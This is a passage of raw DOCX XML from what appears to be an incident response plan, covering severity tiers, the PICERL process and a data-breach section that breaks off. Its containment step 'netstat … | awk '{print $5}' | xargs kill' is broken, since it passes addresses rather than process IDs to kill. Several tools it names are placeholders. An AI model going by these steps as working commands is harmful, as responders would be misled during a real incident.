        <w:t xml:space="preserve">ts to the organization, including financial damage, brand and reputational damage, and other types of harm.  The incident may be the result of a sophisticated or unsophisticated threat, an automated or manual attack, or may be nuisance/vandalism.   The CSI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">RT will determine:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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whether there is evidence of the vulnerability being exploited</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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whether there is a known patch</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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whether this is a new threat (for example, zero day) or a known threat</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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the estimated effort to contain the problem</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858"/>
        <w:gridCol w:w="2098"/>
        <w:gridCol w:w="1978"/>
        <w:gridCol w:w="2083"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="270"/>
        </w:trPr>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Category</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9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Indicators</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7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Scope</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="000000" w:fill="00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Action</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1230"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ff0000" w:fill="ff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0000" w:fill="ff0000"/>
              <w:spacing w:after="0" w:before="0" w:line="331" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0" w:left="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">1 – Critical</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ff0000" w:fill="ff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9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0000" w:fill="ff0000"/>
              <w:spacing w:after="0" w:before="0" w:line="331" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0" w:left="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Data loss, Malware</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ff0000" w:fill="ff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7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0000" w:fill="ff0000"/>
              <w:spacing w:after="0" w:before="0" w:line="331" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0" w:left="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Widespread and/or with critical servers or data loss, stolen data, or unauthorized data access</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ff0000" w:fill="ff0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0000" w:fill="ff0000"/>
              <w:spacing w:after="0" w:before="0" w:line="331" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0" w:left="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Implement CSIRT, Incident Response Plan, create Cyber Security Incident, Organization-wide</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1230"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffc000" w:fill="ffc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c000" w:fill="ffc000"/>
              <w:spacing w:after="0" w:before="0" w:line="331" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0" w:left="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">2 – High</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffc000" w:fill="ffc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9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c000" w:fill="ffc000"/>
              <w:spacing w:after="0" w:before="0" w:line="331" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0" w:left="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Theoretical threat becomes active</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffc000" w:fill="ffc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7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c000" w:fill="ffc000"/>
              <w:spacing w:after="0" w:before="0" w:line="331" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0" w:left="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Widespread and/or with critical servers or data loss, stolen data, or unauthorized data access</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffc000" w:fill="ffc0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c000" w:fill="ffc000"/>
              <w:spacing w:after="0" w:before="0" w:line="331" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0" w:left="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Implement CSIRT, Incident Response Plan, create Cyber Security Incident, Organization-wide</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="975"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffff00" w:fill="ffff00"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="5" w:space="0"/>
              <w:bottom w:val="single" w:color="000000" w:sz="5" w:space="0"/>
              <w:right w:val="single" w:color="000000" w:sz="5" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="0" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1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b/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">3 – Medium</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>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9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Email phishing or active spreading infection</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>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7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Widespread</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffff00" w:fill="ffff00"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="5" w:space="0"/>
              <w:left w:val="single" w:color="000000" w:sz="5" w:space="0"/>
              <w:bottom w:val="single" w:color="000000" w:sz="5" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="0" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="20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Implement CSIRT, Incident Response Plan, create Security Incident,</w:t>
            </w:r>
            <w:r/>
          </w:p>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Organization-wide</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="510"/>
        </w:trPr>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5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b/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">4 - Low</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>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9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Malware or phishing</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>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97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Individual host or person</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffff00" w:fill="ffff00"/>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8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ffff00" w:fill="ffff00"/>
              <w:spacing w:after="0" w:before="0" w:line="331" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0" w:left="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Notify CSIRT, create Cyber Security Incident</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single" w:color="000000" w:sz="10"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Incident Handling Process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Incident Handling Process</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Incident Handling Process Overview</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both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="2486025" cy="2324100"/>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96092" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId80"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2486025" cy="23240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195.75pt;height:183.00pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId80" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">In the event of a Cyber Security Incident the Cyber Security Incident Response Team will adhere to the PICERL process </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">The Incident Handling Process includes six steps: preparation, identification, containment, eradication, recovery, and lessons learned (PICERL) (NIST, 2012)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserv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i/>
          <w:color w:val="0070c0"/>
          <w:sz w:val="20"/>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Preparation</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Conduct regular cybersecurity training for employees, focusing on data protection and phishing awareness.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Implement multi-factor authentication (MFA) for all critical systems and accounts.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Establish secure data storage policies with encryption for sensitive customer information.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Test and review the Incident Response Plan bi-annually using simulated data breach scenarios.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Maintain an up-to-date inventory of IT assets, including cloud services, databases, and endpoints.</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i/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Security measures such as regular vulnerability scans, training programs, and multifactor authentication are essential components of preparation (SANS Institute, 2021).</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Identification</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Monitor security tools such as IDS/IPS and SIEM for suspicious activity and alerts.</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Analyze unusual traffic patterns, such as excessive data exfiltration or unauthorized access attempts.</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Cross-check logs from affected systems to confirm unauthorized data access.</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Check system logs: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/auth.log</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Access application logs: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/app/logs/error.log</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Review backup storage: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">/mnt/backup/storage/</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Validate alerts through threat intelligence platforms and correlation of events.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Notify the CSIRT immediately upon confirmation of a potential data breach.</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Containment</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Disconnect or isolate compromised systems from the network to prevent further spread.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Disable affected user accounts and revoke unauthorized privileges.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Isolate a system:</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1420"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Command:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> iptables -A INPUT -s [IP] -j DROP</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>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Terminate unauthorized sessions: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1420"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Command: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat -tn | grep [IP] | awk '{print $5}' | xargs kill</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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Preserve logs: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1420"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Path: /var/log/auth.log or /var/log/syslog</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Apply firewall rules to block malicious IPs or suspicious traffic sources.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Implement temporary containment measures, such as network segmentation, to restrict access.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Preserve evidence, including system logs and network traces, for forensic analysis.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i/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Containment procedures include isolating affected systems and blocking malicious IPs to prevent further damage (NIST, 2012).</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Eradication</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Remove malware, backdoors, or any unauthorized changes from affected systems.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Apply security patches and updates to eliminate known vulnerabilities.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Conduct a thorough system audit to confirm all traces of the threat have been removed.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Scan for residual indicators of compromise (IoCs) across all connected systems.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Perform malware scan using enterprise tools:</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Command: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">malware_scan_tool --scan-all / --log-file=/var/log/malware_scan.log</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>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Remove identified malware:</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Command: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">malware_scan_tool --remove --log-file=/var/log/removal.log</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>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Apply security patches:</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Run: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt update &amp;&amp; sudo apt upgrade -y</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for Linux systems)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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 </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Verify the integrity of critical files and configurations to ensure they haven’t been tampered with.</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Recovery</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Restore affected systems and databases from verified secure backups.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Test restored systems to confirm they are free from vulnerabilities or infections.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Reconnect systems to the network in a phased approach, starting with low-risk environments.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Monitor restored systems closely for signs of abnormal activity or recurring threats.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Validate backups before restoration:</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Use backup validation tool: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">backup_check --verify /backup/latest/.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>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Restore system from clean backup:</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Command: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">restore_tool --source=/backup/latest/ --destination=/root/server/.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>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Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconnect systems in phases:</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Step 1: "Reconnect low-risk devices to the network."</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720"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: "Gradually restore high-priority systems."</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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2"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Resume normal operations with a detailed report to stakeholders on the incident resolution.</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Lessons Learned</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Conduct a post-mortem review with the CSIRT and relevant stakeholders to assess the incident.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Identify gaps in the response process and areas for improvement in the Incident Response Plan.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Update security policies and protocols based on insights from the breach.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Share anonymized findings with regulators and industry peers to improve collective defenses.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Schedule follow-up training sessions for employees to reinforce cybersecurity practices.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Incident Specific Handling Processes </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="140"/>
        <w:pBdr>
          <w:top w:val="single" w:color="000000" w:sz="5"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Data Breach</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Validate the breach using IDS tools.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Notify internal stakeholders and legal advisors immediately.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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i/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
